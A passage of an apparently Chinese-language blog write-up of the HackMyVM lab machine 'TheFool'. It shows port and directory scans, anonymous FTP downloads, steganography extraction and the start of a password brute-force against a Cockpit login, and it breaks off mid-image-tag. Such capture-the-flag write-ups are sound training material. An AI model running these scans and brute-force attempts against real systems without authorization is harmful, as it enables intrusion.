{"id":718,"date":"2024-07-06T16:10:48","date_gmt":"2024-07-06T08:10:48","guid":{"rendered":"http:\/\/162.14.82.114\/?p=718"},"modified":"2024-07-06T16:10:48","modified_gmt":"2024-07-06T08:10:48","slug":"hmv-_-thefool","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/718\/07\/06\/2024\/","title":{"rendered":"hmv[-_-]TheFool"},"content":{"rendered":"<h1>TheFool<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609616.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609616.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240429122534274\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609618.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609618.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706143841947\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<pre><code class=\"language-bash\">IP=192.168.0.127<\/code><\/pre>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TheFool]\n\u2514\u2500$ rustscan -a $IP -- -A          \n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.0.127:21\nOpen 192.168.0.127:80\nOpen 192.168.0.127:9090\n\nPORT     STATE SERVICE         REASON  VERSION\n21\/tcp   open  ftp             syn-ack vsftpd 3.0.3\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to ::ffff:192.168.0.143\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 4\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n| -rw-r--r--    1 1000     1000           37 Oct 22  2021 note.txt\n|_-rw-r--r--    1 1000     1000        44515 Oct 22  2021 thefool.jpg\n80\/tcp   open  http            syn-ack nginx 1.18.0\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-title: Site doesn&#039;t have a title (text\/html).\n|_http-server-header: nginx\/1.18.0\n9090\/tcp open  ssl\/zeus-admin? syn-ack\n| ssl-cert: Subject: commonName=thefool\/organizationName=8bcad1b0827e4446af3c9d6bc08fdef6\n| Subject Alternative Name: IP Address:127.0.0.1, DNS:localhost\n| Issuer: commonName=thefool\/organizationName=8bcad1b0827e4446af3c9d6bc08fdef6\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2024-07-06T06:39:27\n| Not valid after:  2025-07-06T06:39:27\n| MD5:   bbf7:033d:3384:8589:6138:897b:d770:323c\n| SHA-1: a51d:1536:4ceb:5802:5780:66db:6c5e:a78b:b61d:cf55\n| -----BEGIN CERTIFICATE-----\n| MIIDXDCCAkSgAwIBAgIUGLvR4xCETV7GeTvTLrAo1mrWob0wDQYJKoZIhvcNAQEL\n| BQAwPTEpMCcGA1UECgwgOGJjYWQxYjA4MjdlNDQ0NmFmM2M5ZDZiYzA4ZmRlZjYx\n| EDAOBgNVBAMMB3RoZWZvb2wwHhcNMjQwNzA2MDYzOTI3WhcNMjUwNzA2MDYzOTI3\n| WjA9MSkwJwYDVQQKDCA4YmNhZDFiMDgyN2U0NDQ2YWYzYzlkNmJjMDhmZGVmNjEQ\n| MA4GA1UEAwwHdGhlZm9vbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB\n| AOQNprZTYtUpIJ5nzWxjiLSQahMzPifk\/lU6ivfY29JvhVmJls2MNKM3MjK8Ulm5\n| 3qdzQSIPTf\/RssNStUcFCheBePHa907PmLol4WW4UKXZUjjTlu1m5gLGY48CfTqU\n| hF5eX8PWtnlYeQvenlmIQK2z1dQMMb9ax4DBkj1qBouFjPulY641HQUau1uMJK+p\n| EYQRgy3p8QKHqcxLEcRFvjSXgrpL8QEJ54MEwtjWu18qHjD0XAStwCiXQYZfMMXc\n| nkpDEuEYQjgbzRnfnxCnkdUxIRzeRwg5BUM5ZqWgp\/UBs0jxa82ekFjE42cqh+XC\n| j0WaymeUuiTm3HXPBumAHskCAwEAAaNUMFIwGgYDVR0RBBMwEYcEfwAAAYIJbG9j\n| YWxob3N0MA8GA1UdEwEB\/wQFMAMBAf8wDgYDVR0PAQH\/BAQDAgGuMBMGA1UdJQQM\n| MAoGCCsGAQUFBwMBMA0GCSqGSIb3DQEBCwUAA4IBAQCd73XgOShwzGYB3fed5BTM\n| 4+KOC1fqx7ZIGL2WsqsCQoLQYZ6wd1Q7Cn6Nmwn8JIzEJ9LRoB7bZo\/aBCfmkry4\n| J6bbNEgFbHxSPXYY\/6dvCd4Byau1EIxdHT0HrXps9y0t17Jt3e08tGfKc05EOATB\n| MpehP0gRxVMW92L8gkRBzr4d\/nn9ZEkNzTrNyprQPaCJPnYjL5uj6UCsfy0AcHPY\n| ECjTmuXYonJVq0XZYgMkxk0yG5cP3K5DsmV3kslKv9kUOJd\/hG1gsPE96nmtrTqM\n| kbCXE7HE6phBUvWOUgGsEbq1Itru7AqueafJj1ew0zuxJ13AtV9mgsxbc6c7QvEl\n|_-----END CERTIFICATE-----\n| fingerprint-strings: \n|   GetRequest, HTTPOptions: \n|     HTTP\/1.1 400 Bad request\n|     Content-Type: text\/html; charset=utf8\n|     Transfer-Encoding: chunked\n|     X-DNS-Prefetch-Control: off\n|     Referrer-Policy: no-referrer\n|     X-Content-Type-Options: nosniff\n|     Cross-Origin-Resource-Policy: same-origin\n|     &lt;!DOCTYPE html&gt;\n|     &lt;html&gt;\n|     &lt;head&gt;\n|     &lt;title&gt;\n|     request\n|     &lt;\/title&gt;\n|     &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text\/html; charset=utf-8&quot;&gt;\n|     &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n|     &lt;style&gt;\n|     body {\n|     margin: 0;\n|     font-family: &quot;RedHatDisplay&quot;, &quot;Open Sans&quot;, Helvetica, Arial, sans-serif;\n|     font-size: 12px;\n|     line-height: 1.66666667;\n|     color: #333333;\n|     background-color: #f5f5f5;\n|     border: 0;\n|     vertical-align: middle;\n|     font-weight: 300;\n|_    margin: 0 0 10p\n|_ssl-date: TLS randomness does not represent time\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port9090-TCP:V=7.94SVN%T=SSL%I=7%D=7\/6%Time=6688E738%P=x86_64-pc-linux-\nSF:gnu%r(GetRequest,E70,&quot;HTTP\/1\\.1\\x20400\\x20Bad\\x20request\\r\\nContent-Typ\nSF:e:\\x20text\/html;\\x20charset=utf8\\r\\nTransfer-Encoding:\\x20chunked\\r\\nX-\nSF:DNS-Prefetch-Control:\\x20off\\r\\nReferrer-Policy:\\x20no-referrer\\r\\nX-Co\nSF:ntent-Type-Options:\\x20nosniff\\r\\nCross-Origin-Resource-Policy:\\x20same\nSF:-origin\\r\\n\\r\\n29\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;html&gt;\\n&lt;head&gt;\\n\\x20\\x20\\x20\\x\nSF:20&lt;title&gt;\\r\\nb\\r\\nBad\\x20request\\r\\nd08\\r\\n&lt;\/title&gt;\\n\\x20\\x20\\x20\\x20&lt;m\nSF:eta\\x20http-equiv=\\&quot;Content-Type\\&quot;\\x20content=\\&quot;text\/html;\\x20charset=u\nSF:tf-8\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20name=\\&quot;viewport\\&quot;\\x20content=\\&quot;width=\nSF:device-width,\\x20initial-scale=1\\.0\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;style&gt;\\n\\tbody\nSF:\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20margin:\\x200;\\n\\\nSF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20font-family:\\x20\\&quot;RedHat\nSF:Display\\&quot;,\\x20\\&quot;Open\\x20Sans\\&quot;,\\x20Helvetica,\\x20Arial,\\x20sans-serif;\\\nSF:n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20font-size:\\x2012px;\\n\\\nSF:x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20line-height:\\x201\\.66666\nSF:667;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20color:\\x20#333333\nSF:;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20background-color:\\x2\nSF:0#f5f5f5;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\\x20\\x20\\x20\\x20\\\nSF:x20\\x20img\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20border\nSF::\\x200;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20vertical-align\nSF::\\x20middle;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20\\x20h1\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20font\nSF:-weight:\\x20300;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x20\\x20\\x20\\x20\\x\nSF:20\\x20\\x20\\x20p\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20m\nSF:argin:\\x200\\x200\\x2010p&quot;)%r(HTTPOptions,E70,&quot;HTTP\/1\\.1\\x20400\\x20Bad\\x2\nSF:0request\\r\\nContent-Type:\\x20text\/html;\\x20charset=utf8\\r\\nTransfer-Enc\nSF:oding:\\x20chunked\\r\\nX-DNS-Prefetch-Control:\\x20off\\r\\nReferrer-Policy:\nSF:\\x20no-referrer\\r\\nX-Content-Type-Options:\\x20nosniff\\r\\nCross-Origin-R\nSF:esource-Policy:\\x20same-origin\\r\\n\\r\\n29\\r\\n&lt;!DOCTYPE\\x20html&gt;\\n&lt;html&gt;\\\nSF:n&lt;head&gt;\\n\\x20\\x20\\x20\\x20&lt;title&gt;\\r\\nb\\r\\nBad\\x20request\\r\\nd08\\r\\n&lt;\/tit\nSF:le&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20http-equiv=\\&quot;Content-Type\\&quot;\\x20content=\\&quot;\nSF:text\/html;\\x20charset=utf-8\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;meta\\x20name=\\&quot;viewpor\nSF:t\\&quot;\\x20content=\\&quot;width=device-width,\\x20initial-scale=1\\.0\\&quot;&gt;\\n\\x20\\x20\nSF:\\x20\\x20&lt;style&gt;\\n\\tbody\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\\nSF:x20\\x20margin:\\x200;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20f\nSF:ont-family:\\x20\\&quot;RedHatDisplay\\&quot;,\\x20\\&quot;Open\\x20Sans\\&quot;,\\x20Helvetica,\\x2\nSF:0Arial,\\x20sans-serif;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2\nSF:0font-size:\\x2012px;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20l\nSF:ine-height:\\x201\\.66666667;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20color:\\x20#333333;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\\nSF:x20background-color:\\x20#f5f5f5;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\n\\x\nSF:20\\x20\\x20\\x20\\x20\\x20\\x20\\x20img\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2\nSF:0\\x20\\x20\\x20\\x20border:\\x200;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x2\nSF:0\\x20\\x20vertical-align:\\x20middle;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20}\\\nSF:n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20h1\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\\nSF:x20\\x20\\x20\\x20\\x20font-weight:\\x20300;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20}\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20p\\x20{\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x\nSF:20\\x20\\x20\\x20\\x20\\x20margin:\\x200\\x200\\x2010p&quot;);\nService Info: OS: Unix<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TheFool]\n\u2514\u2500$ gobuster dir -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.127\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,bak,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 12]\nProgress: 4527 \/ 1323366 (0.34%)[ERROR] Get &quot;http:\/\/192.168.0.127\/109.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.127\/firefox.zip&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 23827 \/ 1323366 (1.80%)[ERROR] Get &quot;http:\/\/192.168.0.127\/815&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)[ERROR] Get &quot;http:\/\/192.168.0.127\/soc.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.127\/soc.bak&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.127\/815.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 31651 \/ 1323366 (2.39%)[ERROR] Get &quot;http:\/\/192.168.0.127\/200604&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.127\/fiction.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.127\/fiction.html&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.127\/200604.zip&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.127\/200604.txt&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.127\/200604.php&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\n[ERROR] Get &quot;http:\/\/192.168.0.127\/781.html&quot;: context deadline exceeded (Client.Timeout exceeded while awaiting headers)\nProgress: 47930 \/ 1323366 (3.62%)\n[!] Keyboard interrupt detected, terminating.\nProgress: 47930 \/ 1323366 (3.62%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<pre><code class=\"language-bash\"># 192.168.0.127\n&lt;!-- :D --&gt;\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609619.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609619.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706144515778\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TheFool]\n\u2514\u2500$ whatweb http:\/\/192.168.0.127:9090\/     \nhttp:\/\/192.168.0.127:9090\/ [301 Moved Permanently] Country[RESERVED][ZZ], IP[192.168.0.127], RedirectLocation[https:\/\/192.168.0.127:9090\/], Title[Moved], UncommonHeaders[x-dns-prefetch-control,referrer-policy,x-content-type-options,cross-origin-resource-policy]\nhttps:\/\/192.168.0.127:9090\/ [200 OK] Cookies[cockpit], Country[RESERVED][ZZ], HTML5, HttpOnly[cockpit], IP[192.168.0.127], PasswordField, Script[text\/javascript], Title[Loading...], UncommonHeaders[content-security-policy,x-dns-prefetch-control,referrer-policy,x-content-type-options,cross-origin-resource-policy]<\/code><\/pre>\n<h3>\u654f\u611f\u7aef\u53e3<\/h3>\n<p>\u53d1\u73b0\u5f00\u542f\u4e86ftp\u670d\u52a1\uff0c\u5c1d\u8bd5\u8fdb\u884c\u641c\u7d22\u4fe1\u606f\uff0c\u4f7f\u7528\u9ed8\u8ba4\u7528\u6237\u767b\u5f55\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TheFool]\n\u2514\u2500$ ftp $IP              \nConnected to 192.168.0.127.\n220 (vsFTPd 3.0.3)\nName (192.168.0.127:kali): ftp\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls -la\n229 Entering Extended Passive Mode (|||31087|)\n150 Here comes the directory listing.\ndrwxr-xr-x    2 0        113          4096 Oct 22  2021 .\ndrwxr-xr-x    2 0        113          4096 Oct 22  2021 ..\n-rw-r--r--    1 1000     1000        35245 Oct 22  2021 .m0rse.wav\n-rw-r--r--    1 1000     1000           37 Oct 22  2021 note.txt\n-rw-r--r--    1 1000     1000        44515 Oct 22  2021 thefool.jpg\n226 Directory send OK.\nftp&gt; mget *\nmget note.txt [anpqy?]? \n229 Entering Extended Passive Mode (|||23110|)\n150 Opening BINARY mode data connection for note.txt (37 bytes).\n100% |******************************************************************************************************|    37       29.54 KiB\/s    00:00 ETA\n226 Transfer complete.\n37 bytes received in 00:00 (6.24 KiB\/s)\nmget thefool.jpg [anpqy?]? \n229 Entering Extended Passive Mode (|||17049|)\n150 Opening BINARY mode data connection for thefool.jpg (44515 bytes).\n100% |******************************************************************************************************| 44515      194.73 MiB\/s    00:00 ETA\n226 Transfer complete.\n44515 bytes received in 00:00 (13.33 MiB\/s)\nftp&gt; get .m0rse.wav\nlocal: .m0rse.wav remote: .m0rse.wav\n229 Entering Extended Passive Mode (|||39676|)\n150 Opening BINARY mode data connection for .m0rse.wav (35245 bytes).\n100% |******************************************************************************************************| 35245        1.43 MiB\/s    00:00 ETA\n226 Transfer complete.\n35245 bytes received in 00:00 (1.27 MiB\/s)\nftp&gt; exit\n221 Goodbye.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TheFool]\n\u2514\u2500$ cat note.txt  \nWhat kind of joke is this morse code?\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TheFool]\n\u2514\u2500$ stegseek thefool.jpg                                \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: &quot;&quot;\n[i] Original filename: &quot;note.txt&quot;.\n[i] Extracting to &quot;thefool.jpg.out&quot;.\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TheFool]\n\u2514\u2500$ ls             \nnote.txt  thefool.jpg  thefool.jpg.out\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/TheFool]\n\u2514\u2500$ cat thefool.jpg.out \nRelax nad have fun.\n-minerva<\/code><\/pre>\n<p>\u7136\u540e\u4f7f\u7528<a href=\"https:\/\/morsecode.world\/international\/decoder\/audio-decoder-adaptive.html\">\u5728\u7ebf\u7f51\u7ad9<\/a>\u770b\u4e00\u4e0b\u8fd9\u4e2a\u9690\u85cf\u6587\u4ef6\u7684\u83ab\u65af\u5bc6\u7801\u662f\u5565\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609620.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609620.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706145105180\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u6ca1\u5565\u6d88\u606f\uff0c\u7ee7\u7eed\u641c\u7d22\u4fe1\u606f\u3002<\/p>\n<h3>\u7206\u7834<\/h3>\n<p>\u5c1d\u8bd5\u6293\u5305\uff1a<\/p>\n<pre><code class=\"language-bash\">GET \/cockpit\/login HTTP\/1.1\nHost: 192.168.0.127:9090\nCookie: cockpit=deleted\nX-Superuser: any\nAuthorization: Basic dXNlcm5hbWU6cGFzc3dvcmQ=\nSec-Ch-Ua-Mobile: ?0\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/90.0.4430.212 Safari\/537.36\nSec-Ch-Ua: &quot; Not A;Brand&quot;;v=&quot;99&quot;, &quot;Chromium&quot;;v=&quot;90&quot;\nAccept: *\/*\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609621.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609621.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706150716205\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609622.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609622.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240706151646320\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u968f\u4fbf\u627e\u4e2a<code>top_password<\/code>\u7684\u5b57\u5178\u8fdb\u884c\u7206\u7834\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609623.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407061609623.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" 